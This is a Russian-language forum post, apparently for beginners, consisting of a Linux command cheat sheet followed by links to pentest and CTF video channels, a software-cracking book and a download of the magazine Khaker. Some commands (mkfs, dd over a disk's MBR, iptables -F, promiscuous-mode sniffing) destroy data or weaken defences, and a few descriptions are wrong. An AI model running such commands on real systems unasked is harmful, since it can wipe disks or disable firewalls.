**chattr +u file1** данный атрибут указывает, что при удалении файла
содержимое его будет сохранено и при необходимости пользователь сможет его
восстановить

**lsattr** показать атрибуты файлов
========================================================
**Архивирование и сжатие файлов**

**bunzip2 file1.bz2** разжимает файл 'file1.gz'
**gunzip file1.gz** _разжимает файл 'file1.gz' _
**gzip file1** сжимает файл 'file1'
**bzip2 file1** _сжимает файл 'file1'_
**gzip -9 file1** сжать файл file1 с максимальным сжатием
**rar a file1.rar test_file** создать rar-архив 'file1.rar' и включить в него
файл test_file
**rar a file1.rar file1 file2 dir1** создать rar-архив 'file1.rar' и включить
в него file1, file2 и dir1
**unrar x file1.rar** распаковать rar-архив
**tar -cvf archive.tar file1** создать tar-архив archive.tar, содержащий файл
file1
**tar -cvf archive.tar file1 file2 dir1** создать tar-архив archive.tar,
содержащий файл file1, file2 и dir1

**tar -tf archive.tar** показать содержимое архива
**tar -xvf archive.tar** распаковать архив
**tar -xvf archive.tar -C /tmp** распаковать архив в /tmp
**tar -cvfj archive.tar.bz2 dir1** создать архив и сжать его с помощью bzip2
_(Прим.переводчика. ключ -j работает не во всех *nix системах)_

**tar -xvfj archive.tar.bz2** разжать архив и распаковать его
_(Прим.переводчика. ключ -j работает не во всех *nix системах)_

**tar -cvfz archive.tar.gz dir1** создать архив и сжать его с помощью gzip
**tar -xvfz archive.tar.gz** разжать архив и распаковать его
**zip file1.zip file1** создать сжатый zip-архив
**zip -r file1.zip file1 file2 dir1** создать сжатый zip-архив и со включением
в него нескольких файлов и/или директорий

**unzip file1.zip** разжать и распаковать zip-архив
=====================================
**RPM пакеты (Fedora, Red Hat и тому подобное)**
**rpm -ivh package.rpm** установить пакет с выводом сообщений и прогресс-бара
**rpm -ivh --nodeps package.rpm** установить пакет с выводом сообщений и
прогресс-бара без контроля зависимостей

**rpm -U package.rpm** обновить пакет без изменений конфигурационных файлов, в
случае отсутствия пакета, он будет установлен

**rpm -F package.rpm** обновить пакет только если он установлен
**rpm -e package_name.rpm** удалить пакет
**rpm -qa** отобразить список всех пакетов, установленных в системе
**rpm -qa | grep httpd** среди всех пакетов, установленных в системе, найти пакет содержащий в своём имени "httpd"

**rpm -qi package_name** вывести информацию о конкрентном пакете
**rpm -qg "System Environment/Daemons"** отобразить пакеты входящие в группу
пакетов
**rpm -ql package_name** вывести список файлов, входящих в пакет
**rpm -qc package_name** вывести список конфигурационных файлов, входящих в
пакет
**rpm -q package_name --whatrequires** вывести список пакетов, необходимых для
установки конкретного пакета по зависимостям

**rpm -q package_name --scripts** отобразит скрипты, запускаемые при
установке/удалении пакета

**rpm -q package_name --changelog** вывести историю ревизий пакета
**rpm -qf /etc/httpd/conf/httpd.conf** проверить какому пакету принадлежит
указанный файл. Указывать следует полный путь и имя файла.

**rpm -qp package.rpm -l** отображает список файлов, входящих в пакет, но ещё
не установленных в систему

**rpm --import /media/cdrom/RPM-GPG-KEY** ипортировать публичный ключ цифровой
подписи

**rpm --checksig package.rpm** проверит подпись пакета
**rpm -qa gpg-pubkey** проверить целостность установленного содержимого пакета
**rpm -V package_name** проверить размер, полномочия, тип, владельца, группу,
MD5-сумму и дату последнего изменеия пакета

**rpm -Va** проверить содержимое всех пакеты установленные в систему.
Выполняйте с осторожностью!

**rpm -Vp package.rpm** проверить пакет, который ещё не установлен в систему
**rpm2cpio package.rpm | cpio --extract --make-directories _bin_** извлечь из пакета файлы содержащие в своём имени bin

**rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm** установить пакет,
собранный из исходных кодов

**rpmbuild --rebuild package_name.src.rpm** собрать пакет из исходных кодов
=========================================================
**YUM - средство обновления пакетов(Fedora, RedHat и тому подобное)**

**yum install package_name** закачать и установать пакет
**yum update** обновить все пакеты, установленные в систему
**yum update package_name** обновить пакет
**yum remove package_name** удалить пакет
**yum list** вывести список всех пакетов, установленных в систему
**yum search package_name** найти пакет в репозитории
**yum clean packages** очисть rpm-кэш, удалив закачанные пакеты
**yum clean headers** удалить все заголовки файлов, которые система использует
для разрешения зависимостей

**yum clean all** очисть rpm-кэш, удалив закачанные пакеты и заголовки
======================================================
**DEB пакеты (Debian, Ubuntu и тому подобное)

dpkg -i package.deb** установить / обновить пакет
**dpkg -r package_name** удалить пакет из системы
**dpkg -l** показать все пакеты, установленные в систему
**dpkg -l | grep httpd** среди всех пакетов, установленных в системе, найти пакет содержащий в своём имени "httpd"

**dpkg -s package_name** отобразить инфрмацию о конкретном пакете
**dpkg -L package_name** вывести список файлов, входящих в пакет,
установленный в систему

**dpkg --contents package.deb** отобразить список файлов, входящих в пакет,
который ешё не установлен в систему

**dpkg -S /bin/ping** найти пакет, в который входит указанный файл.
====================================================
**APT - средство управление пакетами (Debian, Ubuntu и тому подобное)**

**apt-get install package_name** установить / обновить пакет
**apt-cdrom install package_name** установить / обновить пакет с cdrom'а
**apt-get update** получить обновлённые списки пакетов
**apt-get upgrade** обновить пакеты, установленные в систему
**apt-get remove package_name** удалить пакет, установленный в систему с
сохранением файлов конфигурации

**apt-get purge package_name** удалить пакет, установленный в систему с
удалением файлов конфигурации

**apt-get check** проверить целостность зависимостей
**apt-get clean** удалить загруженные архивные файлы пакетов
**apt-get autoclean** удалить старые загруженные архивные файлы пакетов
=========================================================
**Просмотр содержимого файлов

cat file1** вывести содержимое файла file1 на стандартное устройсво вывода
**tac file1** вывести содержимое файла file1 на стандартное устройсво вывода в
обратном порядке (последняя строка становиться первой и т.д.)

**more file1** постраничный вывод содержимого файла file1 на стандартное
устройство вывода
**less file1** постраничный вывод содержимого файла file1 на стандартное
устройство вывода, но с возможностью пролистывания в обе стороны (вверх-вниз),
поиска по содержимому и т.п.

**head -2 file1** вывести первые две строки файла file1 на стандартное
устройство вывода. По-умолчанию выводится десять строк

**tail -2 file1** вывести последние две строки файла file1 на стандартное
устройство вывода. По-умолчанию выводится десять строк

**tail -f /var/log/messages** выводить содержимое файла /var/log/messages на
стандартное устройство вывода по мере появления в нём текста.
========================================
**Манипуляции с текстом**

**cat file | grep -i "Criteria" > result.txt** общий синтаксис выполнения действий по обработке содержимого файла и вывода результата в новый

**cat file | grep -i "Criteria" » result.txt** общий синтаксис выполнения действий по обработке содержимого файла и вывода результата в существующий файл. Если файл не существует, он будет создан

**grep Aug /var/log/messages** из файла '/var/log/messages' отобрать и вывести
на стандартное устройство вывода строки, содержащие "Aug"

**grep ^Aug /var/log/messages** из файла '/var/log/messages' отобрать и
вывести на стандартное устройство вывода строки, начинающиеся на "Aug"

**grep [0-9] /var/log/messages** из файла '/var/log/messages' отобрать и
вывести на стандартное устройство вывода строки, содержащие цифры

**grep Aug -R /var/log/*** отобрать и вывести на стандартное устройство вывода
строки, содержащие "Aug", во всех файлах, находящихся в директории /var/log и
ниже

**sed 's/stringa1/stringa2/g' example.txt** в файле example.txt заменить
"string1" на "string2", результат вывести на стандартное устройство вывода.

**sed '/^$/d' example.txt** удалить пустые строки из файла example.txt
**sed '/ *#/d; /^$/d' example.txt** удалить пустые строки и комментарии из
файла example.txt_
**echo 'test' | tr '[:lower:]' '[:upper:]'**_преобразовать символы из нижнего регистра в верхний
**sed -e '1d' result.txt** удалить первую строку из файла example.txt
**sed -n '/string1/p'** отобразить только строки содержашие "string1"
**sed -e 's/ *$//' example.txt** удалить пустые символы в в конце каждой
строки
**sed -e 's/string1//g' example.txt** удалить строку "string1" из текста не
изменяя всего остального

**sed -n '1,8p;5q' example.txt** взять из файла с первой по восьмую строки и
из них вывести первые пять

**sed -n '5p;5q' example.txt** вывести пятую строку
**sed -e 's/0*/0/g' example.txt** заменить последовательность из любого
количества нулей одним нулём

**cat -n file1** пронумеровать строки при выводе содержимого файла
**cat example.txt | awk 'NR%2==1'** при выводе содержимого файла, не выводить чётные строки файла

**echo a b c | awk '{print $1}'** вывести первую колонку. Разделение, по-умолчанию, по проблелу/пробелам или символу/символам табуляции

**echo a b c | awk '{print $1,$3}' **вывести первую и треью колонки. Разделение, по-умолчанию, по проблелу/пробелам или символу/символам табуляции

**paste file1 file2** объединить содержимое file1 и file2 в виде таблицы:
строка 1 из file1 = строка 1 колонка 1-n, строка 1 из file2 = строка 1 колонка
n+1-m

**paste -d '+' file1 file2** объединить содержимое file1 и file2 в виде
таблицы с разделителем "+"

**sort file1 file2** отсортировать содержимое двух файлов_
**sort file1 file2 | uniq** _отсортировать содержимое двух файлов, не отображая повторов_
**sort file1 file2 | uniq -u** _отсортировать содержимое двух файлов, отображая только уникальные строки (строки, встречающиеся в обоих файлах, не выводятся на стандартное устройство вывода)_

**sort file1 file2 | uniq -d** _отсортировать содержимое двух файлов, отображая только повторяющиеся строки

**comm -1 file1 file2** сравнить содержимое двух файлов, не отображая строки
принадлежащие файлу 'file1'

**comm -2 file1 file2** сравнить содержимое двух файлов, не отображая строки
принадлежащие файлу 'file2'

**comm -3 file1 file2** сравнить содержимое двух файлов, удаляя строки
встречающиеся в обоих файлах
==================================================
**Преобразование наборов символов и файловых форматов

**dos2unix filedos.txt fileunix.txt** конвертировать файл текстового формата
из MSDOS в UNIX (разница в символах возврата коретки)

**unix2dos fileunix.txt filedos.txt** конвертировать файл текстового формата
из UNIX в MSDOS (разница в символах возврата коретки)

**recode ..HTML < page.txt > page.html** конвертировать содержимое тестового
файла page.txt в html-файл page.html**_
**recode -l | more** _вывести список доступных форматов
==========================================
**Анализ файловых систем

**badblocks -v /dev/hda1** проверить раздел hda1 на наличие bad-блоков
**fsck /dev/hda1** проверить/восстановить целостность linux-файловой системы
раздела hda1
**fsck.ext2 /dev/hda1** проверить/восстановить целостность файловой системы
ext2 раздела hda1

**e2fsck -j /dev/hda1** проверить/восстановить целостность файловой системы
ext3 раздела hda1 с указанием, что журнал расположен там же

**fsck.ext3 /dev/hda1** проверить/восстановить целостность файловой системы
ext3 раздела hda1

**fsck.vfat /dev/hda1** проверить/восстановить целостность файловой системы
fat раздела hda1**
=============================
**Форматирование файловых систем

mkfs /dev/hda1 создать linux-файловую систему на разделе hda1
**mke2fs /dev/hda1** создать файловую систему ext2 на разделе hda1
**mke2fs -j /dev/hda1** создать журналирующую файловую систему ext3 на разделе
hda1
**mkfs -t vfat 32 -F /dev/hda1** создать файловую систему FAT32 на разделе
hda1
**fdformat -n /dev/fd0** форматирование флоппи-диска без проверки
**mkswap /dev/hda3** создание swap-пространства на разделе hda3 **
===================================================
**swap-пространство

**mkswap /dev/hda3** создание swap-пространства на разделе hda3
**swapon /dev/hda3** активировать swap-пространство, расположенное на разделе
hda3
**swapon /dev/hda2 /dev/hdb3** активировать swap-пространства, расположенные
на разделах hda2 и hdb3 **
==============================
**Создание резервных копий (backup)

**dump -0aj -f /tmp/home0.bak /home** создать полную резервную копию
директории /home в файл /tmp/home0.bak

**dump -1aj -f /tmp/home0.bak /home** создать инкрементальную резервную копию
директории /home в файл /tmp/home0.bak

**restore -if /tmp/home0.bak** восстановить из резервной копии /tmp/home0.bak
**rsync -rogpav --delete /home /tmp** синхронизировать /tmp с /home
**rsync -rogpav -e ssh --delete /home ip_address:/tmp** синхронизировать через
SSH-туннель

**rsync -az -e ssh --delete ip_addr:/home/public /home/local**
синхронизировать локальную директорию с удалённой директорией через ssh-
туннель со сжатием

**rsync -az -e ssh --delete /home/local ip_addr:/home/public**
синхронизировать удалённую директорию с локальной директорией через ssh-
туннель со сжатием

**dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr 'dd of=hda.gz'** сделать "слепок" локального диска в файл на удалённом компьютере через ssh-туннель

**tar -Puf backup.tar /home/user** создать инкрементальную резервную копию
директории '/home/user' в файл backup.tar с сохранением полномочий**_
**( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr 'cd /home/share/ && tar x -p' **_копирование содержимого /tmp/local на удалённый компьютер через ssh-туннель в /home/share/_

**( tar c /home ) | ssh -C user@ip_addr 'cd /home/backup-home && tar x -p'**_копирование содержимого /home на удалённый компьютер через ssh-туннель в /home/backup-home_

**tar cf - . | (cd /tmp/backup ; tar xf - )**_копирование одной директории в другую с сохранением полномочий и линков_

**_find /home/user1 -name '*.txt' |_** _**xargs cp -av --target-
directory=/home/backup/ --parents** поиск в /home/user1 всех файлов, имена
которых оканчиваются на '.txt', и копирование их в другую директорию

**find /var/log -name '*.log' | tar cv --files-from=- | bzip2 > log.tar.bz2** поиск в /var/log всех файлов, имена которых оканчиваются на '.log', и создание bzip-архива из них

**dd if=/dev/hda of=/dev/fd0 bs=512 count=1** создать копию MBR (Master Boot
Record) с /dev/hda на флоппи-диск

**dd if=/dev/fd0 of=/dev/hda bs=512 count=1** восстановить MBR с флоппи-диска
на /dev/hda
=====================================================================
**Сеть (LAN и WiFi)**_

_**ifconfig eth0** показать конфигурацию сетевого интерфейса eth0
**ifup eth0** активировать (поднять) интерфейс eth0
**ifdown eth0** деактивировать (опустить) интерфейс eth0
**ifconfig eth0 192.168.1.1 netmask 255.255.255.0** выставить интерфейсу eth0
ip-адрес и маску подсети

**ifconfig eth0 promisc** перевести интерфейс eth0 в promiscuous-режим для
"отлова" пакетов (sniffing)

**ifconfig eth0 -promisc** отключить promiscuous-режим на интерфейсе eth0
**dhclient eth0** активировать интерфейс eth0 в dhcp-режиме.
**route -n** вывести локальную таблицу маршрутизации
**netstat -rn** _вывести локальную таблицу маршрутизации_
**route add -net 0/0 gw IP_Gateway** задать ip-адрес шлюза по умолчанию
(default gateway)
**route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1** добавить
статический маршрут в сеть 192.168.0.0/16 через шлюз с ip-адресом 192.168.1.1

**route del 0/0 gw IP_gateway** удалить ip-адрес шлюза по умолчанию (default
gateway)
**echo "1" > /proc/sys/net/ipv4/ip_forward** разрешить пересылку пакетов
(forwarding)
**hostname** отобразить имя компьютера
**host[www.yandex.ru](http://www.yandex.ru/) **разрешить имя
[www.yandex.ru](http://www.yandex.ru/) хоста в ip-адрес и наоборот
**host 93.158.134.3** _разрешить имя[www.yandex.ru](http://www.yandex.ru/)
хоста в ip-адрес и наоборот_
**ip link show** отобразить состояние всех интерфейсов
**mii-tool eth0** отобразить статус и тип соединения для интерфейса eth0
**ethtool eth0** отображает статистику интерфеса eth0 с выводом такой
информации, как поддерживаемые и текущие режимы соединения

**netstat -tupn** отображает все установленные сетевые соединения по
протоколам TCP и UDP без разрешения имён в ip-адреса и PID'ы и имена
процессов, обеспечивающих эти соединения

**netstat -tupln** отображает все сетевые соединения по протоколам TCP и UDP
без разрешения имён в ip-адреса и PID'ы и имена процессов, слушающих порты

**tcpdump tcp port 80** отобразить весь трафик на TCP-порт 80 (обычно - HTTP)
**iwlist scan** просканировать эфир на предмет, доступности беспроводных точек
доступа
**iwconfig eth1** показать конфигурацию беспроводного сетевого интерфейса eth1
=============================================================
**Microsoft Windows networks(SAMBA)

**nbtscan ip_addr** разрешить netbios-имя _nbtscan не во всех системах
ставится по-умолчанию, возможно, придётся доустанавливать вручную. nmblookup
включен в пакет samba._

**nmblookup -A ip_addr** _разрешить netbios-имя _nbtscan не во всех системах
ставится по-умолчанию, возможно, придётся доустанавливать вручную. nmblookup
включен в пакет samba.__

**smbclient -L ip_addr/hostname** отобразить ресурсы, предоставленные в общий
доступ на windows-машине

**smbget -Rr smb://ip_addr/share** подобно wget может получить файлы с
windows-машин через smb-протокол

**mount -t smbfs -o username=user,password=pass //winclient/share /mnt/share**
смонтировать smb-ресурс, предоставленный на windows-машине, в локальную
файловую систему **
=================================================================
**IPTABLES (firewall)

**iptables -t filter -nL** отобразить все цепочки правил
**iptables -nL** _отобразить все цепочки правил_
**iptables -t nat -L** отобразить все цепочки правил в NAT-таблице
**iptables -t filter -F** очистить все цепочки правил в filter-таблице
**iptables -F** _очистить все цепочки правил в filter-таблице_
**iptables -t nat -F** очистить все цепочки правил в NAT-таблице
**iptables -t filter -X** удалить все пользовательские цепочки правил в
filter-таблице
**iptables -t filter -A INPUT -p tcp --dport telnet -j ACCEPT** позволить
входящее подключение telnet'ом

**iptables -t filter -A OUTPUT -p tcp --dport http -j DROP** блокировать
исходящие HTTP-соединения

**iptables -t filter -A FORWARD -p tcp --dport pop3 -j ACCEPT** позволить
"прокидывать" (forward) POP3-соединения

**iptables -t filter -A INPUT -j LOG --log-prefix "DROP INPUT"** включить
журналирование ядром пакетов, проходящих через цепочку INPUT, и добавлением к
сообщению префикса "DROP INPUT"

**iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE** включить NAT (Network
Address Translate) исходящих пакетов на интерфейс eth0. Допустимо при
использовании с динамически выделяемыми ip-адресами.**_

**_iptables -t nat -A PREROUTING -d 192.168.0.1 -p tcp -m tcp --dport 22_**
_**-j DNAT --to-destination 10.0.0.2:22** перенаправление пакетов,
адресованных одному хосту, на другой хост
===================================================================
**Мониторинг и отладка

**top** отобразить запущенные процессы, используемые ими ресурсы и другую
полезную информацию (с автоматическим обновлением данных)

**ps -eafw** отобразить запущенные процессы, используемые ими ресурсы и другую
полезную информацию (единожды)

**ps -e -o pid,args --forest** вывести PID'ы и процессы в виде дерева
**pstree** отобразить дерево процессов
**kill -9 98989** "убить" процесс с PID 98989 "на смерть" (без соблюдения
целостности данных)
**kill -KILL 98989** _" убить" процесс с PID 98989 "на смерть"_
**kill -TERM 98989** Корректно завершить процесс с PID 98989
**kill -1 98989** заставить процесс с PID 98989 перепрочитать файл
конфигурации
**kill -HUP 98989** _заставить процесс с PID 98989 перепрочитать файл
конфигурации_
**lsof -p 98989** отобразить список файлов, открытых процессом с PID 98989
**lsof /home/user1** отобразить список открытых файлов из директории
/home/user1
**strace -c ls > /dev/null** вывести список системных вызовов, созданных и
полученных процессом ls

**strace -f -e open ls > /dev/null** вывести вызовы бибилотек
**watch -n1 'cat /proc/interrupts'** отображать прерывания в режиме реального
времени
**last reboot** отобразить историю перезагрузок системы
**last user1** отобразить историю регистрации пользователя user1 в системе и
время его нахождения в ней

**lsmod** вывести загруженные модули ядра
**free -m** показать состояние оперативной памяти в мегабайтах
**smartctl -A /dev/hda** контроль состояния жёсткого диска /dev/hda через
SMART
**smartctl -i /dev/hda** проверить доступность SMART на жёстком диске /dev/hda
**tail /var/log/dmesg** вывести десять последних записей из журнала загрузки
ядра
**tail /var/log/messages** вывести десять последних записей из системного
журнала **
===============================================================
**Другие полезные команды

**apropos _…keyword_** выводит список комманд, которые так или иначе относятся
к ключевым словам. Полезно, когда вы знаете что делает программа, но не
помните команду

**man ping** вызов руководства по работе с программой, в данном случае, - ping
**whatis** _**…keyword** _отображает описание действий указанной программы
**mkbootdisk --device /dev/fd0`uname -r`** создаёт загрузочный флоппи-диск
**gpg -c file1** шифрует файл file1 с помощью GNU Privacy Guard
**gpg file1.gpg** дешифрует файл file1 с помощью GNU Privacy Guard**_

_**ldd /usr/bin/ssh** вывести список библиотек, необходимых для работы ssh
**alias hh= 'history'** назначить алиас hh команде history_

[Тестовый вариант (как шпаргалка, а лучше
распечатать)](https://yadi.sk/i/tCsEvGFwxvx6Nw)

Видяшки

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fyt3.ggpht.com%2Fa%2FAATXAJziU9huNywtU2QIJWZM9PePsFRvMR3tXqZwecHe%3Ds900-c-k-c0x00ffffff-
no-rj&hash=55fe9e38c7685c7b51be68be9e165bbb&return_error=1)

### [ IppSec
](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA?&ab_channel=IppSec)

Video Search: https://ippsec.rocks

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fyt3.ggpht.com%2Fa%2FAATXAJzAdtGxm49UaXL0uE2x2mh55Dsm6-q-EL6OZOLiSA%3Ds900-c-k-c0x00ffffff-
no-rj&hash=7f1bb2b0b3d829f7920387092178b94e&return_error=1)

### [ John Hammond
](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw?&ab_channel=JohnHammond)

Hello World! I post tutorials and videos on lots of programming languages. I'd
like to share some of my knowledge with everyone, so try and spread the word
a...

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F02e79665%2Fimg%2Ffavicon_32.png&hash=9f15b0a12d7ca413e354992941378923&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FMV52KO2wpX0%2Fhqdefault.jpg%3Fsqp%3D-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ%3D%3D%26rs%3DAOn4CLB4SI52DF_xKSlfqPQI5xJ7KjDkhw%26days_since_epoch%3D18584&hash=eb2bb502e5340f734ab966cc96f1980b&return_error=1)

### [ PentestIT2015
](https://www.youtube.com/playlist?list=PLr0GtLTVffQNiH5Crg3J6uECV0jrXcRE7)

Enjoy the videos and music you love, upload original content, and share it all
with friends, family, and the world on YouTube.

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FjA6xOReLrGs%2Fhqdefault.jpg%3Fsqp%3D-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ%3D%3D%26rs%3DAOn4CLBr0RTqphB3AxfLwtgVs2tV1q6XPg%26days_since_epoch%3D18584&hash=d2a1ebb627a79dad7af296444859f6b0&return_error=1)

### [ Metasploit
](https://www.youtube.com/playlist?list=PLr0GtLTVffQOyitZ2EgTZxHUbr0G5u8fy)

Enjoy the videos and music you love, upload original content, and share it all
with friends, family, and the world on YouTube.

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fi.ytimg.com%2Fvi%2F0bGEqTeYJvg%2Fhqdefault.jpg%3Fsqp%3D-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ%3D%3D%26rs%3DAOn4CLCJNSZQoSeyXMIB4GA-
YpMnQLy31A%26days_since_epoch%3D18584&hash=2647f4f7b29dccc34a5fcd99acc300e9&return_error=1)

### [ Zsa ](https://www.youtube.com/playlist?list=PLr0GtLTVffQOOM-
kTe-6wn3qEITglTflV)

Enjoy the videos and music you love, upload original content, and share it all
with friends, family, and the world on YouTube.

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FkkemSXS16Yk%2Fhqdefault.jpg%3Fsqp%3D-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ%3D%3D%26rs%3DAOn4CLDVZ5FkB0-c09Bm5NeM35O3dMK6nQ%26days_since_epoch%3D18584&hash=4c6b721aad3516877b48aec3739f52f8&return_error=1)

### [ sql
](https://www.youtube.com/playlist?list=PLr0GtLTVffQNVu_dJ04aXtwiMTFQzaGDn)

Enjoy the videos and music you love, upload original content, and share it all
with friends, family, and the world on YouTube.

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FZq74GyIswaY%2Fhqdefault.jpg%3Fsqp%3D-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ%3D%3D%26rs%3DAOn4CLAfH5RvaueRuNfu7yjiKnN2tVY2Xg%26days_since_epoch%3D18584&hash=be9d576cf2792939153c59bcba70cfa3&return_error=1)

### [ WireShark ](https://www.youtube.com/playlist?list=PLr0GtLTVffQNQ-
VIHs1cm2uOqlPJ9iCLF)

Enjoy the videos and music you love, upload original content, and share it all
with friends, family, and the world on YouTube.

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FCXqmZmfIgMA%2Fhqdefault.jpg%3Fsqp%3D-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ%3D%3D%26rs%3DAOn4CLCLKWQamNs9b4U65NseLQXHWhB7Hg%26days_since_epoch%3D18584&hash=18c5f7104e05c4ffbbc313278549a93e&return_error=1)

### [ Web
](https://www.youtube.com/playlist?list=PLr0GtLTVffQM-E5s2NfFgPq8iQ1L_l-l3)

Enjoy the videos and music you love, upload original content, and share it all
with friends, family, and the world on YouTube.

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fi.ytimg.com%2Fvi%2Fi-i66a_WIy8%2Fhqdefault.jpg%3Fsqp%3D-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ%3D%3D%26rs%3DAOn4CLB1Ig8z0tfr_uyK1__vdc8GbqQJRw%26days_since_epoch%3D18584&hash=50a290a9acbdc17e2cf969ba92d7cbfd&return_error=1)

### [ IT ](https://www.youtube.com/playlist?list=PLr0GtLTVffQMDpXj-
Ha6k9HlbksgDysIq)

Enjoy the videos and music you love, upload original content, and share it all
with friends, family, and the world on YouTube.

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fyt3.ggpht.com%2Fytc%2FAAUvwnjl4FhcrdhUGqC1O072HC3YjfvYhdSe66AmplcOgg%3Ds900-c-k-c0x00ffffff-
no-rj&hash=dcc0ffab83767948302289e6f2249222&return_error=1)

### [ JJ Lima
](https://www.youtube.com/channel/UCN82sPMFOLuM30BuTMZ8Mfg?&ab_channel=JJLima)

Canal voltado a divulgação de conteúdo com fins Demonstrativos/Educacionais e
de conscientização nas boas praticas de implementação de técnicas de SEGURANÇA
...

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fyt3.ggpht.com%2Fa%2FAATXAJyxq13GSNksQ8SYEOOMfOso-6ZeulOqhsiNwDD08g%3Ds900-c-k-c0xffffffff-
no-rj-mo&hash=bfdf754f9d44b70478434d41146f10c2&return_error=1)

### [ CTF в Петербурге
](https://www.youtube.com/channel/UCaqi7baKiDd8jMR_fyjjccw/playlists?&ab_channel=CTFвПетербурге)

CTF в Петербурге (SPbCTF) — открытое независимое сообщество по спортивному
хакингу из Санкт-Петербурга. Мы проводим семинары и тренировки по компьютерной
без...

![www.youtube.com](/proxy.php?image=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F8ec42c4f%2Fimg%2Ffavicon_32.png&hash=fd3e0560a9951e481f79da28cd9f59f3&return_error=1)
www.youtube.com


**Взлом программного обеспечения. Анализ и использование кода.**

Spoiler: Взлом программного обеспечения. Анализ и использование кода.

![](/proxy.php?image=https%3A%2F%2Fi109.fastpic.ru%2Fbig%2F2019%2F0217%2F42%2F4165d525d73236f0254ddecdcd92ec42.png&hash=be794368805fbbd61cc466f178a5d697)

<https://yadi.sk/i/PeXiLU1Ed1qH_g>


**Клейнберг. Тардос. "Алгоритмы. Разработка и применение."**

Spoiler: Алгоритмы. Разработка и применение.

![](/proxy.php?image=https%3A%2F%2Fi109.fastpic.ru%2Fbig%2F2019%2F0217%2Feb%2Faef098ca5fcbc2281eff487cba0071eb.png&hash=3bad9d95c3712470f5185c038b1bafd2)

<https://yadi.sk/i/zVtAtrSq1uEjrg>


Добавлю, что важным в изучении чего угодно и во имя чего угодно являются
личные наблюдения, внимательность. Как при изучении интерфейса, так и
отдельного софта. Древо прокачки у каждого человека разное. Кто то полюбит
изучать сугубо софт. И это тоже похвально. Кому то по душе файловые системы, и
расположения каталогов в них. Кто то грезит реестром... каждому своё. Успехов
и удачи в делах.

Зы.зы.. тут конечно есче должно быть кучу линков на всякий матан, но я устану
их все проверять, поэтому тащите новые. Да и вобче, если в сети наткнулись на
годный матан не стесняйтесь постить тут. Это есть личное пространства
новичков. Если кто чем дополнит.. Это только приветствуется.

Журнал "Хакер". Собираем выпуски и статьи.

Author: coder131313 • 2009-03-08T17:22:26+0000 • Replies: 181 • Views: 82K
Наконец то его в сеть выложили

**Хакер №1 (121) январь 2009**


![](/proxy.php?image=http%3A%2F%2Fpic.ipicture.ru%2Fuploads%2F090306%2F39786%2F4f7475dT7g.jpg&hash=1395e7244bb1c7bbfeade23b51b75289)


[**Скачать**](http://depositfiles.com/ru/files/llva8h357)

**Год выпуска: 2009
Жанр: Компьютерная литература
Формат: DJVU
Качество: Отсканированные страницы
